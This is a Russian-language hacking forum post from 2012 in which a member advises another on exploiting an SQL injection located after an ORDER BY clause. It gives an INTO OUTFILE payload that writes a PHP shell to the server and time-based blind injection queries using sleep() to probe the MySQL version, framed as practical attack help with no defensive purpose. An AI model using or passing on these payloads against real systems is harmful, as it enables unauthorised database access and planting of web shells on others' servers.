ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 03.01.2012, 13:48
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами: 8255126

Репутация: 78
По умолчанию

Цитата:
Сообщение от [R  
eD"]
[R]eD said:
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?
UNION не работает кстати после ORDER BY.

Единственное, что я вижу, что можно попробовать, это

Код:
INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +''
Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off

Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало.

Крутить как-то так:

Код:
, 100
UPD

Код:
SELECT user FROM mysql.user  ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0));

SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0));
Ток если записей много, то лучше юзать LIMIT.

Что-то по типу blind sleep-based sql injection
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 13 (пользователей: 0 , гостей: 13)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.